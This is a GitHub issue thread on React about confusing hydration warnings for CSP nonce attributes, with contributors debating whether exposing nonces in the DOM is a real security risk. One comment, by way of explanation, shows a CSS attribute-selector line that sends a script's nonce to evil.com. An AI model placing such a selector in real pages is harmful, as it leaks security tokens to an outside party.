### ISSUE TITLE
Bug: Handle nonce hydration warnings better

### ISSUE THREAD

**Issue by kentcdodds** [facebook/react#26028]
React version: 18.2.0

## Steps To Reproduce

1. Create an app with a CSP
2. Server render your app with a `nonce` in script tags and hydrate those tags with or without the nonce prop and observe warnings that insufficiently describe the seriousness of security vulnerabilities and how to fix them.

Link to code example:

https://github.com/kentcdodds/nonce-hydration-issues

## The current behavior

We get warnings about extra nonce prop or a mismatch of the nonce value which are insufficient.

## The expected behavior

Most of the issue is described in the README for the project. But we've got two warnings that could be improved. In the case of the client hydrating without the `nonce` (because it correctly doesn't know what the nonce value is), the warning should be either removed or improved to explain you should pass an empty string for the `nonce` value to match what the browser did to it.

In the case of the client hydrating *with* the `nonce` (because it incorrectly *does* know what the nonce value is), the warning should explain that they have a security vulnerability that should be fixed because if the client hydration code knows what the `nonce` value is then XSS attackers could know as well.

## Suggested solutions:

(copied from the project readme):

Update the error messages to explain the problem and solution.

- The `Extra attributes from the server: nonce` error message should be updated
  to explain issue with `nonce`. Maybe something like:
  `Extra attributes from the server: nonce. The nonce attribute is a security feature and should not be passed to the client. Instead, set the nonce attribute to an empty string when client rendering.`
  Alternatively, you could just not warn about the extra `nonce` attribute at
  all.
- The `Prop nonce did not match` error message should be updated to explain the
  issue with `nonce`. Maybe something like:
  `Prop nonce did not match. The nonce attribute is a security feature and should not be passed to the client as yours appears to do currently which makes your application vulnerable to cross-site scripting attacks. Instead, set the nonce attribute to an empty string when client rendering. Make certain to not send the nonce value in the DOM anywhere other than in the nonce attribute of scripts and links.`
  Whatever we do, we definitely want to make sure people are aware this is a
  serious security vulnerability.

## Video walkthrough:

I'm live streaming this now. Here's my walkthrough of the problem: https://www.youtube.com/watch?v=YboFmtwxIBk&t=1h57m

**Comment by YounessFkhach** [comment]
what you are missing out is that while you can't access the nonce from element.getAttribute("nonce")
you cann access it from inside the script by calling script.nonce

the browser doesn't clear it, but just prevents reading it from outside of the script itself

P.S read the discord chat

**Comment by kentcdodds** [comment]
Even if you *can* access the `nonce` from the JS code, you shouldn't render the actual `nonce` value anywhere in the DOM because as soon as you do it is going to open you up to XSS vulnerabilities.

**Comment by sophiebits** [comment]
Related spec discussion:
* https://github.com/whatwg/html/pull/2373

**Comment by jamischarles** [comment]
> Alternatively, you could just not warn about the extra nonce attribute at
all
Any easy way / workarounds to suppress this error?  I'm seeing this error when I render a vanilla `<script>` tag in an RSC (via next.js app router)

Adding `suppressHydrationWarning` to my script tag doesn't seem to work either.

**Comment by Guo-dalu** [comment]
> Any easy way / workarounds to suppress this error? I'm seeing this error when I render a vanilla `<script>` tag in an RSC (via next.js app router)
> 
> Adding `suppressHydrationWarning` to my script tag doesn't seem to work either.

Using Script from `next/script` instead of the vanilla script would fix it.

**Comment by fcano-ut** [comment]
> what you are missing out is that while you can't access the nonce from `element.getAttribute("nonce")` you cann access it from inside the script by calling `script.nonce`
> 
> the browser doesn't clear it, but just prevents reading it from outside of the script itself
> 
> while I agree that if there was no nonce from the server, we shouldn't have to pass an empty string
> 
> P.S read the discord chat



> Even if you _can_ access the `nonce` from the JS code, you shouldn't render the actual `nonce` value anywhere in the DOM because as soon as you do it is going to open you up to XSS vulnerabilities.


The only difference between using the `nonce` attribute vs. rendering the nonce anywhere else, is that `nonce` prevents a very narrow type of attack where the attacker uses CSS selectors to track the user, such as:

```
script[nonce=a] { background: url("https://evil.com/nonce?a");}
```

For some apps, that kind of risk is acceptable and having a nonce rendered in the DOM proves to be more beneficial than otherwise.

- Relies in being able to pre-guess the value of nonce in advance, which is very unlikely
- Relies on a bad actor having access to add arbitrary CSS to the page
- The only attack "consequence" is being able to send the value of the nonce to a third-party domain, but that doesn't seem insecure since we re-generate the nonce on every request.
- The attack can be mitigated by not using `unsafe-inline` and `unsafe-eval`.

There's a discussion here https://github.com/w3c/webappsec-csp/issues/458 and I would like to quote this:

>  CSP does not provide any meaningful security guarantees once a single attacker-controlled script has executed.


For many apps the disadvantages can outweight the advantages. For example, using Google Tag Manager to any page using strict CSPs is impossible without passing the value of nonce to the tag manager script, which makes it available on the DOM. And using GTM "script" tags (https://eu.umbhost.net/blog/2023/10/how-to-pass-a-content-security-nonce-csp-to-google-tag-manager) is not possible either.

I would suggest suppressing this warning, but I'd be against considering this a bad practice in an error message, because for me the answer is a bit more complicated than than 🤔

**Comment by Kasopej** [comment]
TLDR: @kentcdodds  I agree the nonce hydration error needs more context, but I don't agree it's a security error... instead it would be helpful to let developers know that the browser strips nonce attributes which is what causes the hydration error (see: [https://github.com/vercel/next.js/issues/63749)](url)

....
CSP only governs requests/content happening within the document. Only scripts that pass the trust specs (nonce, whitelists) can run in the application. And if a trusted script is compromised, XSS is in play and it's up to other security mechanisms to limit the attack surface

So extra steps to hide nonce values (which are per-request in fact) are low impact IMO. The guarantee should not be that nonce values are not available from within the document to attackers to whitelabel their attack scripts, but instead that only trusted scripts (and their dependent scripts) can even access anything from the document

Security goes beyond csp, so if we try to oversecure csp instead of seeing it as just an element, it would probably degrade developer experience which would lead to more bad habits and over-architecting
